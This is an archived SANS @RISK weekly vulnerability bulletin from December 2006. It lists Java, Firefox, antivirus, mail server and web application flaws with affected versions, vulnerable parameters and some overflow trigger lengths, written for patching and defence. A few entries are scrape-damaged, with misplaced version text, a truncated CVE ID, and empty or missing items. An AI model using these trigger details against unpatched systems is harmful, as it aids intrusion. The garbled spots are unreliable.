Last day to save $500 for SANS San Diego 2013

@RISK: The Consensus Security Vulnerability Alert

Volume: V, Issue: 51
December 26, 2006

SANS Newsletters Home

Both Firefox and JAVA Run Time Environment and SDK have high risk vulnerabilities that need attention because their exploitation is easy.

All of us at SANS hope you have a healthy and satisfying year in 2007. We look forward to your comments, contributions, and criticisms, and to seeing you at one of SANS educational programs.

@RISK is the SANS community's consensus bulletin summarizing the most important vulnerabilities and exploits identified during the past week and providing guidance on appropriate actions to protect your systems (PART I). It also includes a comprehensive list of all new vulnerabilities discovered in the past week (PART II).

Summary of the vulnerabilities reported this week:

    • Category
    • # of Updates & Vulnerabilities
    • Platform Number of Updates and Vulnerabilities
    • - ------------------------ -------------------------------------
    • Windows
    • 4 (#3)
    • Microsoft Office
    • 2
    • Third Party Windows Apps
    • 7 (#5, #6, #8)
    • Mac Os
    • 1
    • Linux
    • 2
    • Cross Platform
    • 18 (#1, #2, #4)
    • Web Application - Cross Site Scripting
    • 4
    • Web Application - SQL Injection
    • 4
    • Web Application
    • 31 (#7)
    • Network Device
    • 3
    • ______________________________________________________________________
Table Of Contents
Part II -- Comprehensive List of Newly Discovered Vulnerabilities from Qualys (www.qualys.com)
Windows
Microsoft Office
Third Party Windows Apps
Mac Os
Linux
Cross Platform
Web Application - Cross Site Scripting
Web Application - SQL Injection
Web Application
Network Device
PART I Critical Vulnerabilities

Part I for this issue has been compiled by Rob King and Rohit Dhamankar at TippingPoint, a division of 3Com, as a by-product of that company's continuous effort to ensure that its intrusion prevention products effectively block exploits using known vulnerabilities. TippingPoint's analysis is complemented by input from a council of security managers from twelve large organizations who confidentially share with SANS the specific actions they have taken to protect their systems. A detailed description of the process may be found at http://www.sans.org/newsletters/cva/#process

Widely Deployed Software
  • (2) HIGH: Sun Java Runtime Environment Multiple Vulnerabilities
  • Affected:
    • Sun JDK and JRE 5.0 Update 7 and prior
    • Sun SDK and JRE 1.4.2_12 and prior
    • Sun SDK and JRE 1.3.1_18 and prior

  • Description: The Sun Java Runtime Environment and the Sun Java Software Developer Kit (SDK) contain multiple vulnerabilities. These vulnerabilities include remote code execution, privilege escalation, and information disclosure. If a user browses a webpage containing a malicious Java applet, the applet may be able to execute arbitrary code on the client system with the privileges of the logged-on user. Note that the Java applets are automatically downloaded and executed in typical browser configurations. Also, the Sun Java Runtime Environment is installed by default on Microsoft Windows systems prior to Windows XP, many Unix and Unix-like operating systems (including Sun Solaris), and many Linux distributions. Previous flaws in JRE have been exploited to compromise systems in the wild; hence, this update should be applied on an expedited basis.

  • Status: Sun confirmed, updates available.

  • Council Site Actions: All reporting council sites are responding to this issue. They are either relying on the vendors' Auto Update feature or they plan to distribute the updates during their next regularly scheduled system maintenance cycle.

  • References:
  • (4) LOW: Mozilla Firefox Information Disclosure
  • Affected:
    • Mozilla Firefox versions 2.0.1 and prior

  • Description: Mozilla Firefox's password manager component contains an information disclosure weakness. The password manager can be used to automatically fill out username and password forms. If this capability is used on web pages that can have arbitrary HTML code included by an attacker, the attacker could gain these username and password entries. This vulnerability can be exploited to conduct phishing attacks such as stealing MySpace passwords etc. Note that this issue is distinct from the other Mozilla issues outlined in this edition of @RISK. A proof of concept for this vulnerability is publicly available.

  • Status: Mozilla confirmed, updates available.

  • Council Site Actions: All reporting council sites are using Mozilla, although it is not officially supported by their perspective IT departments. Thus, all sites are relying on Mozilla's Auto Update features to install the latest updates. Status: Mozilla Bugzilla Entry https://bugzilla.mozilla.org/show_bug.cgi?id=360493 Posting by fash1on@gmail.com http://www.securityfocus.com/archive/1/452382 Proof of Concept http://www.info-svc.com/news/11-21-2006/ rcsr1/"> http://www.info-svc.com/news/11-21-2006/ rcsr1/ Article by Chapin Information Services http://www.info-svc.com/news/11-21-2006/ SecurityFocus BID http://www.securityfocus.com/bid/21240

Other Software
  • (5) HIGH: ESET NOD32 CAB Parsing Heap Overflow
  • Affected:
    • ESET NOD32 Antivirus versions prior to 1.1743

  • Description: ESET NOD32, a popular antivirus solution, contains a heap overflow in its handling of CAB ("cabinet") archive files. A specially-crafted CAB file could exploit this vulnerability and execute arbitrary code with the privileges of the scanning process.

  • Status: ESET confirmed, updates available.

  • Council Site Actions: The affected software and/or configuration are not in production or widespread use, or are not officially supported at any of the council sites. They reported that no action was necessary.

  • References:
  • (6) HIGH: MailEnable POP3 PASS Command Buffer Overflow
  • Affected:
    • MailEnable Professional and Enterprise Editions versions 2.35 and possibly prior

  • Description: MailEnable, a popular mail solution for Microsoft Windows systems, contains a buffer overflow vulnerability in the POP server's PASS command implementation. An unauthenticated attacker can send an overly-long argument to the PASS command, and exploit this buffer overflow to execute arbitrary code with the privileges of the POP server. Exploit code for the previously disclosed flaws can be easily modified to leverage this flaw.

  • Status: MailEnable confirmed, updates available.

  • Council Site Actions: The affected software and/or configuration are not in production or widespread use, or are not officially supported at any of the council sites. They reported that no action was necessary.

  • References:
  • (7) HIGH: Typo3 Multiple Remote Command Execution Vulnerabilities
  • Affected:
    • Typo3 versions 4.0 - 4.3, 4.1beta
    • Typo3 versions 3.7 and 3.8

  • Description: Typo3, a popular content management system, contains multiple remote command execution vulnerabilities. By passing a specially-crafted request to the application, an attacker could execute arbitrary commands with the privileges of the server process. Note that versions 3.7 and 3.8 are not vulnerable in their default configuration. Technical details and a proof-of-concept are publicly available for these vulnerabilities.

  • Status: Typo3 confirmed, updates available.

  • Council Site Actions: The affected software and/or configuration are not in production or widespread use, or are not officially supported at any of the council sites. They reported that no action was necessary.

  • References:
  • (8) HIGH: McAfee NeoTrace ActiveX Control Buffer Overflow
  • Affected:
    • NeoTrace Express 3.25
    • NeoTrace Pro/McAfee Visual Trace 3.25
    • Other versions may also be vulnerable.

  • Description: McAfee NeoTrace software enables a user to run traceroute, whois etc. utilities on any computers that are trying to connect to the user's system, and display the information graphically. The NeoTraceExplorer.NeoTraceLoader ActiveX control that ships with the NeoTrace software contains a stack-based overflow. The overflow can be triggered by passing an overly long string (500 bytes or more) as an argument to the ActiveX control's "TraceTarget" method. A malicious webpage can exploit the flaw to execute arbitrary code on NeoTrace users' systems. McAfee Visual Trace may be bundled with a number of McAfee software thereby increasing the number of vulnerable systems.

  • Status: McAfee has not confirmed the flaw; no fixes available.

  • References:
Part II: Weekly Comprehensive List of Newly Discovered Vulnerabilities
Week 51, 2006

This list is compiled by Qualys ( www.qualys.com ) as part of that company's ongoing effort to ensure its vulnerability management web service tests for all known vulnerabilities that can be scanned. As of this week Qualys scans for 5314 unique vulnerabilities. For this special SANS community listing, Qualys also includes vulnerabilities that cannot be scanned remotely.

  • 06.51.1 - CVE: Not Available
  • Platform: Windows
  • Title: Sambar FTP Server Remote Denial of Service
  • Description: Sambar FTP Server is vulnerable to a remote denial of service issue when a long sequence of "./" characters (160 or more) is processed. Sambar FTP Server version 6.4 is vulnerable.
  • Ref: http://www.securityfocus.com/bid/21617/info
  • 06.51.2 - CVE: Not Available
  • Platform: Windows
  • Title: Star FTP Server RETR Command Remote Denial of Service
  • Description: Star FTP Server is a File Transfer Protocol Daemon available for Microsoft Windows. The application is exposed to a remote denial of service issue that affects the processing of "RETR" commands. Star FTP Server version 1.10 is affected.
  • Ref: http://www.securityfocus.com/bid/21630/info http://milw0rm.com/exploits/2942
  • 06.51.3 - CVE: Not Available
  • Platform: Windows
  • Title: Microsoft Windows Explorer and Media Player Denial of Service
  • Description: Microsoft Windows Explorer and Windows Media Player are both exposed to a denial of service issue. Please see the link below for further details.
  • Ref: http://www.securityfocus.com/archive/1/454502
  • 06.51.4 - CVE: Not Available
  • Platform: Windows
  • Title: Microsoft Windows MessageBoxA Denial of Service
  • Description: Microsoft Windows is prone to a local denial of service vulnerability because the operating system fails to handle certain API calls with unexpected parameters. Specifically, the vulnerability occurs when the executable makes an API call to the "MessageBoxA" message box and passes certain malicious parameters.
  • Ref: http://www.securityfocus.com/bid/21688
  • 06.51.5 - CVE: Not Available
  • Platform: Microsoft Office
  • Title: Microsoft Project Server 2003 PDSRequest.ASP XML Request Information Disclosure
  • Description: Microsoft Project Server 2003 is prone to an information disclosure vulnerability when an XML request in the "/logon/pdsrequest.asp" script is sent to the HTTP server.
  • Ref: http://www.securityfocus.com/bid/21611
  • 06.51.6 - CVE: Not Available
  • Platform: Microsoft Office
  • Title: Microsoft Outlook ActiveX Control Remote Internet Explorer Denial of Service
  • Description: The Microsoft Office Outlook Recipient Control is exposed to a denial of service issue due to a flawed interaction between Microsoft Outlook and Internet Explorer. Microsoft Outlook XP and prior versions are affected.
  • Ref: http://www.securityfocus.com/bid/21649/info
  • 06.51.7 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Yahoo! Messenger Unspecified ActiveX Control Remote Buffer Overflow
  • Description: Yahoo! Messenger is a freely available chat client distributed and maintained by Yahoo!. An unspecified ActiveX control shipped with Yahoo! Messenger is prone to a buffer overflow vulnerability because it fails to perform sufficient bounds checking of user-supplied input before copying it to an insufficiently sized memory buffer. Yahoo! Messenger versions released prior to November 2, 2006 are affected.
  • Ref: http://messenger.yahoo.com/security_update.php?id=120806
  • 06.51.8 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Intel 2200BG 802.11 Driver Beacon Frame Remote Code Execution
  • Description: Intel 2200BG driver is prone to a remote code execution vulnerability due to a race condition which occurs when "w29n51.sys" fails to properly handle a flood of malformed beacon frames. Intel 2200BG (Mini-PCI) driver version 9.0.3.9 is affected.
  • Ref: http://www.securityfocus.com/bid/21641
  • 06.51.9 - CVE: CVE-2006-6605
  • Platform: Third Party Windows Apps
  • Title: MailEnable POP Service PASS Command Remote Buffer Overflow
  • Description: MailEnable is a commercially available mail server. It is prone to a stack-based buffer overflow vulnerability in the POP service that occurs when the application handles excessively long parameters to the "PASS" command. MailEnable version 2.35 is reportedly vulnerable.
  • Ref: http://www.securityfocus.com/bid/21645
  • 06.51.10 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: AstonSoft DeepBurner DBR Compilation Buffer Overflow
  • Description: AstonSoft DeepBurner is a CD and DVD burning application. It is prone to a remote buffer overflow vulnerability. The vulnerability affects the "file name" tag located in DBR files which contain a listing to be included in a CD/DVD burning project. The application does not allocate a sufficient sized buffer for user-supplied data in these files, allowing an attacker to corrupt process memory by supplying more than 272 bytes as input for the "file name" tag. AstonSoft DeepBurner version 1.8.0 is affected.
  • Ref: http://www.securityfocus.com/bid/21657
  • 06.51.11 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Ozeki HTTP-SMS Gateway Password Information Disclosure
  • Description: Ozeki HTTP-SMS Gateway is an application that allows users to send and receive a large volume of SMS messages over IP SMS connection. This application is exposed to an information disclosure vulnerability. This issue occurs because the application fails to protect sensitive information. Specifically the username and passwords of users are stored in the "HKEY_LOCAL_MACHINESoftwareOzekiSMSServerCurrentVersionPluginshttpsmsgate" registry in clear text. This registry is readable by all users. This issue affects version 1.0.
  • Ref: http://www.securityfocus.com/bid/21679
  • 06.51.12 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: NOD32 Anti-Virus Multiple File Parsing Vulnerabilities
  • Description: NOD32 Anti-Virus is an anti-virus application available for Microsoft Windows. It is exposed to a divide by zero issue when attempting to process CHM files and also to a heap-based buffer overflow issue when attempting to process DOC files. NOD32 Anti-Virus versions prior to 1.1743 are affected.
  • Ref: http://www.securityfocus.com/bid/21682
  • 06.51.13 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: McAfee NeoTrace ActiveX Control Remote Buffer Overflow
  • Description: NeoTrace is a utility that allows users to map computers on the Internet. The NeoTraceExplorer.NeoTraceLoader ActiveX control is vulnerable to a buffer overflow issue when receiving a string of over 500 bytes to the "TraceTarget()" function. McAfee NeoTrace Express version 3.25 and NeoTrace Professional version 3.25 are vulnerable.
  • Ref: http://www.securityfocus.com/bid/21697
  • 06.51.14 - CVE: Not Available10.4.8 is affected.
  • Platform: Mac Os
  • Title: Apple Mac OS X Quicktime For Java Information Disclosure
  • Description: Apple Mac OS X is exposed to an information disclosure issue. Specifically, the vulnerability occurs when Java applets use "Quicktime for Java" to retrieve images rendered on screen by embedded Quicktime objects. Attackers may combine this with Quartz Composer to capture images that contain local information. Apple Mac OS X version
  • Ref: http://www.securityfocus.com/bid/21672
  • 06.51.15 - CVE: CVE-2006-6106
  • Platform: Linux
  • Title: Linux Kernel Bluetooth CAPI Packet Remote Buffer Overflow
  • Description: The Linux kernel is prone to a buffer overflow vulnerability because it fails to bounds check user-supplied data before copying it into an insufficiently sized buffer. Specifically, this issue occurs when the Bluetooth driver attempts to handle excessively large CAPI packets. Versions prior to 2.4.33.5 are affected.
  • Ref: http://www.kernel.org/pub/linux/kernel/v2.4/ChangeLog-2.4.33.5
  • 06.51.16 - CVE: CVE-2006-4814
  • Platform: Linux
  • Title: Linux Kernel MinCore User Space Access Locking Local Denial of Service
  • Description: The Linux kernel is exposed to denial of service issue due to a design error in "mincore()", a system call used to determine the residency of memory pages. Linux Kernel versions prior to 2.4.33.6 are affected.
  • Ref: http://www.securityfocus.com/bid/21663/info
  • 06.51.17 - CVE: VE-2006-5872
  • Platform: Cross Platform
  • Title: SQL-Ledger Unspecified Code Execution
  • Description: SQL-Ledger is a double entry accounting system. It is exposed to a remote code execution issue because the application fails to properly sanitize input to unspecified parameters. SQL-Ledger versions 2.6 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/21634/info
  • 06.51.18 - CVE: Not Available
  • Platform: Cross Platform
  • Title: IBM WebSphere Utility Classes Unspecified Vulnerability
  • Description: IBM WebSphere Application Server is a framework for supporting various enterprise web applications. It is prone to an unspecified vulnerability that is likely to be related to the handling of Java utility classes. IBM WebSphere Application Server versions prior to 5.1.1.13 are reportedly vulnerable.
  • Ref: http://www-1.ibm.com/support/docview.wss?uid=swg24014231
  • 06.51.19 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Multiple Vendor Firewall HIPS Process Spoofing Vulnerability
  • Description: Multiple vendor firewalls and HIPS (host-based intrusion prevention systems) are prone to a process spoofing vulnerability. An attacker can exploit this issue to have an arbitrary malicious program appear to run as a trusted process and function undetected on an affected victim's computer. Please see the advisory for further information.
  • Ref: http://www.securityfocus.com/bid/21615
  • 06.51.20 - CVE: Not Available
  • Platform: Cross Platform
  • Title: OpenOffice Remote Integer Overflow Denial of Service
  • Description: OpenOffice is exposed to a remote denial of service issue because of an integer overflow flaw in the "WW8PLCF::GeneratePLCF()" method when attempting to process malformed Word files. OpenOffice version 2.1 is vulnerable to this issue.
  • Ref: http://www.securityfocus.com/archive/1/454514 http://www.securityfocus.com/bid/21618/info
  • 06.51.21 - CVE: CVE-2006-6475,CVE-2006-6476,CVE-2006-6477
  • Platform: Cross Platform
  • Title: Mandiant First Response Multiple Denial of Service and Agent Hijacking Vulnerabilities
  • Description: Mandiant First Response is an incident-response tool to collect system information such as running processes, system services, registry information, and event logs. It is affected by a denial of service and agent hijack issue. Mandiant First Response version 1.1 is affected.
  • Ref: http://www.securityfocus.com/bid/21548
  • 06.51.22 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Multiple BitDefender Products Parsing Engine Integer Overflow Vulnerabilities
  • Description: Multiple BitDefender applications are exposed to an integer overflow issue because they fail to ensure that integer values are not overrun. When the applications parse crafted packed PE files, a heap-based buffer overflow occurs, resulting from the integer overflow issue. BitDefender for MS Exchange 5.5 0 and prior versions are affected. Ref: http://www.bitdefender.com/KB323-en--cevakrnl.xmd-vulnerability.html http://www.securityfocus.com/bid/21610
  • 06.51.23 - CVE: Not Available
  • Platform: Cross Platform
  • Title: ITalk Plus Multiple Remote Pre-Authentication Buffer Overflow Vulnerabilities
  • Description: Italk Plus is a freely available chat application available for Windows, Unix and Unix-like operating systems. It is susceptible to multiple remote buffer overflow issues due to the application's failure to properly bounds check user-supplied input before copying it to insufficiently sized memory buffers. Italk Plus versions prior to 0.92.1 are affected.
  • Ref: http://italk.sourceforge.net/italk-sa-1.txt
  • 06.51.24 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Kerio MailServer Remote Unspecified LDAP Denial of Service
  • Description: Kerio MailServer is prone to a denial of service vulnerability because the software fails to properly handle malformed LDAP traffic, resulting in an application crash. All current versions are affected.
  • Ref: http://www.securityfocus.com/bid/21602
  • 06.51.25 - CVE: Not Available
  • Platform: Cross Platform
  • Title: IBM DB2 Remote SQLJRA Packet Denial of Service
  • Description: DB2 Universal Database is a database management application written for use on multiple platforms. DB2 Universal Database is affected by a denial of service vulnerability due to a failure of the "sqle_db2ra_as_recvrequest()" function to properly handle malformed "SQLJRA" packets.
  • Ref: http://www-1.ibm.com/support/docview.wss?uid=swg1IY86917
  • 06.51.26 - CVE: Not Available
  • Platform: Cross Platform
  • Title: GNU Wget FTP_Syst Function Remote Denial of Service
  • Description: GNU Wget is a non-interactive command line application to retrieve files using HTTP, HTTPS and FTP. It is prone to a remote denial of service issue in the "ftp_syst()" function when processing an excessive amount of FTP "220" status codes. GNU Wget version 1.10.2 is affected.
  • Ref: http://www.securityfocus.com/bid/21650
  • 06.51.27 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Sun Java Runtime Environment Multiple Remote Privilege Escalation Vulnerabilities
  • Description: Sun Java Runtime Environment is an enterprise development platform. It is vulnerable to multiple unspecified privilege escalation issues. See the advisory for further details.
  • Ref: http://www.securityfocus.com/bid/21673
  • 06.51.28 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Sun Java Runtime Environment Information Disclosure Vulnerabilities
  • Description: The Sun Java runtime environment is prone to multiple information disclosure vulnerabilities. These issues are due to a design flaw in the affected application. Specifically, untrusted applets are inappropriately allowed to access data from other applets in two different circumstances. Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-26-102732-1&searchclause=
  • 06.51.29 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Sun Java RunTime Environment Multiple Buffer Overflow Vulnerabilities
  • Description: The Java Runtime Environment is an application that allows users to run Java applications. It is prone to multiple unspecified buffer overflow vulnerabilities. Please refer to the advisory for further information. Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-26-102729-1&searchclause=
  • 06.51.30 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Oracle Portal Calendar.JSP HTTP Response Splitting
  • Description: Oracle Portal is a portal application which is title integrated with Oracles application server software. It is exposed to a HTTP response splitting issue because it fails to properly sanitize user-supplied input to the "enc" parameter of the "calendar.jsp" script before saving data to the Oracle Web Cache. Oracle Portal version 10g is affected.
  • Ref: http://www.securityfocus.com/archive/1/454945
  • 06.51.31 - CVE: Not Available
  • Platform: Cross Platform
  • Title: RealNetworks RealPlayer ActiveX Control Remote Denial of Service
  • Description: RealNetworks RealPlayer is prone to a denial of service issue. The ActiveX control with a CLSID from the "rpau3260.dll" library is exposed to a denial of service issue. RealPlayer version 10.5 is affected.
  • Ref: http://www.securityfocus.com/bid/21689
  • 06.51.32 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Hitachi Directory Server LDAP Request Handling Multiple Vulnerabilities
  • Description: Hitachi LDAP Directory Server contains multiple denial of service vulnerabilities which are only reported to affect the Microsoft Windows and HP-UX versions of the application. These issues arise when the server handles specially-crafted LDAP requests. Please refer to the attached advisory for details.
  • Ref: http://www.securityfocus.com/bid/21692
  • 06.51.33 - CVE: Not Available
  • Platform: Cross Platform
  • Title: ESET NOD32 Antivirus CAB File Parsing Engine Integer Overflow
  • Description: ESET NOD32 Antivirus is an antivirus application. It is vulnerable to an integer overflow issue as it fails to ensure that integer values are not overrun. Versions prior to 1.1743 are affected.
  • Ref: http://www.securityfocus.com/bid/21701/info
  • 06.51.34 - CVE: Not Available
  • Platform: Cross Platform
  • Title: HTTP Explorer Web Server Directory Traversal
  • Description: HTTP Explorer is a webserver. It is vulnerable to a directory traversal issue when specially-crafted HTTP GET requests contain directory traversal strings. HTTP Explorer version 1.02 is vulnerable.
  • Ref: http://www.securityfocus.com/bid/21712
  • 06.51.35 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Omniture SiteCatalyst Multiple Cross-Site Scripting Vulnerabilities
  • Description: Omniture SiteCatalyst is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input to the "ss" parameter of the "search.asp" script. All current versions are affected.
  • Ref: http://www.securityfocus.com/bid/21620
  • 06.51.36 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: osTicket Support Cards View.PHP Cross Site Scripting
  • Description: osTicket Support Cards is a web-based customer support application. It is prone to a cross site scripting issue because it fails to properly sanitize user-supplied input to the "e" parameter of the "view.php" script. osTicket versions 1.3 beta and 1.2.7 are affected.
  • Ref: http://www.securityfocus.com/bid/21669
  • 06.51.37 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Mini Web Shop View.PHP Viewcategory.PHP Cross-Site Scripting
  • Description: Mini Web Shop is a web-based customer support application implemented in PHP. The application is exposed to a cross-site scripting issue due to improper sanitization of user-supplied input to the "catname" parameter of the "viewcategory.php" script. Mini Web Shop version 2.1.c is affected.
  • Ref: http://www.securityfocus.com/bid/21677/info
  • 06.51.38 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: SugarCRM Sugar Open Source Multiple Unspecified Cross-Site Scripting Vulnerabilities
  • Description: Sugar Open Source is a suite of customer relationship management software. The application is exposed to multiple unspecified cross-site scripting issues as it fails to sufficiently sanitize user-supplied input. Sugar Open Source versions prior to 4.5.0g are affected.
  • Ref: http://www.securityfocus.com/bid/21694/info
  • 06.51.39 - CVE: CVE-2006-6595
  • Platform: Web Application - SQL Injection
  • Title: ScriptMate User Manager Multiple SQL Injection Vulnerabilities
  • Description: ScriptMate User Manager is a platform for registering and managing members and for securing ASP pages. It is vulnerable to multiple SQL injection issues due to insufficient sanitization of user-supplied input to the "mesid" parameter of the "/smusermanager/utilities/usermessages.asp" script. ScriptMate User Manager versions 2.1 and 2.0 are vulnerable.
  • Ref: http://www.hackerscenter.com/archive/view.asp?id=26656
  • 06.51.40 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Contra Haber Sistemi Haber.ASP SQL Injection
  • Description: Contra Haber Sistemi is a web application implemented in ASP. The application is exposed to an SQL injection issue due to insufficient sanitization of user-supplied data to the "id" parameter of the "haber.asp" script before using it in an SQL query. Contra Haber Sistemi version 1.0 is affected.
  • Ref: http://www.securityfocus.com/bid/21626/info http://www.securityfocus.com/archive/1/454594
  • 06.51.41 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Upload_download_de_fichiers Administre2.PHP SQL Injection
  • Description: The Upload_download_de_fichiers application is a file transfer tool. It is vulnerable to an SQL injection issue due to insufficient sanitization of user-supplied input to the "id_user" parameter of the "administre2.php" script. Upload_download_de_fichiers version 3 is affected.
  • Ref: http://www.securityfocus.com/bid/21648/info
  • 06.51.42 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Burak Yilmaz Download Portal Down.ASP SQL Injection
  • Description: Burak Yilmaz Download Portal is a web application. It is exposed to an SQL injection issue due to insufficient sanitization of user-supplied data to the "id" parameter of the "down.asp" script. MaxiASP Burak Yilmaz Download Portal version 0 is affected.
  • Ref: http://www.securityfocus.com/bid/21676
  • 06.51.43 - CVE: CVE-2006-6636
  • Platform: Web Application
  • Title: IBM WebSphere Application Server Multiple Remote Vulnerabilities
  • Description: IBM WebSphere Application Server is a utility designed to facilitate the creation of various enterprise web applications. It is vulnerable to multiple remote vulnerabilities. IBM WebSphere Application Server prior to versions 6.0.2 Fix Pack 17 are vulnerable. See the advisory for further details.
  • Ref: http://www-1.ibm.com/support/docview.wss?uid=swg27006879
  • 06.51.44 - CVE: Not Available
  • Platform: Web Application
  • Title: Knusperleicht Shoutbox Shout.php HTML Injection
  • Description: Knusperleicht Shoutbox adds message and comment posting functionality to web sites. It is prone to an HTML injection issue because it fails to properly sanitize user-supplied input to the "shout.php" script before using it in dynamically generated content. Knusperleicht Shoutbox version 2.6 is vulnerable and other versions may also be affected.
  • Ref: http://www.securityfocus.com/bid/21637
  • 06.51.45 - CVE: Not Available
  • Platform: Web Application
  • Title: Azucar CMS Index_sitios.PHP Remote File Include
  • Description: Azucar CMS is a web-based content management system. It is prone to a remote file include vulnerability due to insufficient sanitization of the "$_GET[_VIEW]" parameter of the "admin/index_sitios.php" script. Azucar CMS version 1.3 is reportedly vulnerable.
  • Ref: http://www.securityfocus.com/bid/21638
  • 06.51.46 - CVE: CVE-2006-6481
  • Platform: Web Application
  • Title: Clam Anti-Virus Attachment Wrapping Denial of Service
  • Description: ClamAV is an antivirus application. It is vulnerable to a denial of service issue due to insufficient handling of attachments. ClamAV versions 0.88.6 and earlier are vulnerable.
  • Ref: http://kolab.org/security/kolab-vendor-notice-14.txt http://www. quantenblog.net/security/virus-scanner-bypass
  • 06.51.47 - CVE: Not Available
  • Platform: Web Application
  • Title: WeBWorK Program Generation Language Macro Security Restriction Bypass
  • Description: WeBWorK Program Generation (PG) Language is a support application for WeBWorK. It is exposed to a security restriction bypass issue due to a failure of the application to properly enforce restrictions in place to deter attackers from running arbitrary script code on affected computers. WeBWorK versions prior to 2.3.1 are affected.
  • Ref: http://www.securityfocus.com/bid/21614
  • 06.51.48 - CVE: CVE-2006-6598
  • Platform: Web Application
  • Title: Torrentflux-B4RT Viewnfo.PHP Directory Traversal
  • Description: Torrentflux-B4RT is a web-based front end for the Torrentflux application. It is vulnerable to a directory traversal issue due to insufficient sanitization of user-supplied input to the "path" parameter of the "viewnfo.php" script. Torrentflux-B4RT versions prior to 2.1-b4rt-97 are vulnerable.
  • Ref: http://www.securityfocus.com/bid/21613
  • 06.51.49 - CVE: CVE-2006-6645
  • Platform: Web Application
  • Title: mxBB Web Links Module MX_Root_Path Remote File Include
  • Description: The web links module for the mxBB bulletin board adds categorized links functionality to the portal application. It is vulnerable to a remote file include issue due to insufficient sanitization of user-supplied input to the "mx_root_path" parameter of the "modules/mx_links/language/lang_english/lang_admin.php" script. mxBB web links module version 2.05 is vulnerable.
  • Ref: http://www.securityfocus.com/bid/21622
  • 06.51.50 - CVE: Not Available
  • Platform: Web Application
  • Title: mxBB Charts Module Module_Root_Path Remote File Include
  • Description: The Charts module for the mxBB bulletin board adds chart functionality to the portal application. It is prone to a remote file include vulnerability because it fails to sufficiently sanitize user-supplied input to the "module_root_path" parameter of the "modules/mx_charts/charts_constants.php" script. mxBB Version 1.0.0 is vulnerable to this issue and other versions may also be affected.
  • Ref: http://www.securityfocus.com/bid/21623
  • 06.51.51 - CVE: Not Available
  • Platform: Web Application
  • Title: Bandwebsite Unauthorized Administrative Account Creation
  • Description: Bandwebsite is a web-based content management framework designed to allow music bands to easily create web sites. It is exposed to an unauthorized administrative account creation due to insufficient sanitization of "admin.php" script. Bandwebsite version 1.5 is affected.
  • Ref: http://www.securityfocus.com/bid/21625
  • 06.51.52 - CVE: Not Available
  • Platform: Web Application
  • Title: ScriptMate User Manager Default.ASP Multiple HTML Injection Vulnerabilities
  • Description: ScriptMate User Manager is a platform for registering and managing members and for securing ASP pages. It is prone to multiple HTML injection vulnerabilities due to insufficient sanitization of the "members_username" and "members_password" parameters of "/smusermanager/members/default.asp". ScriptMate User Manager version 2.1 is reportedly vulnerable.
  • Ref: http://www.securityfocus.com/bid/21472
  • 06.51.53 - CVE: Not Available
  • Platform: Web Application
  • Title: Yaplap Ldap.PHP Remote File Include
  • Description: The Yaplap application is an LDAP administration tool. It is vulnerable to a remote file include issue due to insufficient sanitization of user-supplied input to the "LOGIN_style" parameter of the "ldap.php" script. Yaplap versions 0.6 and 0.6.1 are affected.
  • Ref: http://www.securityfocus.com/bid/21599
  • 06.51.54 - CVE: Not Available
  • Platform: Web Application
  • Title: AR_Memberscript UserCP_menu.PHP Remote File Include
  • Description: The AR_Memberscript application is a tool for managing memberships. It is exposed to a remote file include issue due to insufficient sanitization of user-supplied input to the "script_folder" parameter of the "usercp_menu.php" script.
  • Ref: http://www.milw0rm.com/exploits/2931 http://www.securityfocus.com/bid/21600/info
  • 06.51.55 - CVE: Not Available
  • Platform: Web Application
  • Title: EyeOS Aplic.PHP Arbitrary File Upload
  • Description: EyeOS is a content management system. It is vulnerable to an arbitrary file upload issue due to insufficient sanitization of user-supplied input to the "apps/eyeHome.eyeapp/aplic.php" script. EyeOS versions prior to 0.9.3-3 are affected.
  • Ref: http://www.securityfocus.com/bid/21639
  • 06.51.56 - CVE: Not Available
  • Platform: Web Application
  • Title: VerliAdmin Index.PHP Remote File Include
  • Description: VerliAdmin is an administration tool for the VerliHub application. The application is exposed to a remote file include issue due to insufficient sanitization of user-supplied input to the "q" parameter of the "index.php" script. VerliAdmin version 0.3 is affected.
  • Ref: http://www.securityfocus.com/bid/21640
  • 06.51.57 - CVE: Not Available
  • Platform: Web Application
  • Title: Drupal Project and Project Issues Tracking Modules Multiple HTML Injection Vulnerabilities
  • Description: The Drupal Project and Project issue tracking modules are project management modules for the Drupal content management system. They are vulnerable to multiple HTML injection issues due to insufficient sanitization of user-supplied data to various unspecified fields passed to the "check_plain()" function. See the advisory for further details.
  • Ref: http://drupal.org/node/103943
  • 06.51.58 - CVE: Not Available
  • Platform: Web Application
  • Title: KDE LibkHTML NodeType Function Denial of Service
  • Description: KDE Libkhtml is a HTML parsing library used by applications such as Konqueror and Kmail. It is exposed to denial of service issue in the "nodeType()" function. KDE Libkhtml version 4.2, KDE Konqueror version 3.5.2 and KDE kmail version 1.9.1 are affected.
  • Ref: http://www.securityfocus.com/bid/21662
  • 06.51.59 - CVE: Not Available
  • Platform: Web Application
  • Title: PHPFanBase Protection.PHP Remote File Include
  • Description: PHPFanBase is prone to a remote file include vulnerability because it fails to sufficiently sanitize user-supplied input to the "siteurl" parameter of the "protection.php" script. All current versions are affected.
  • Ref: http://www.securityfocus.com/bid/21664
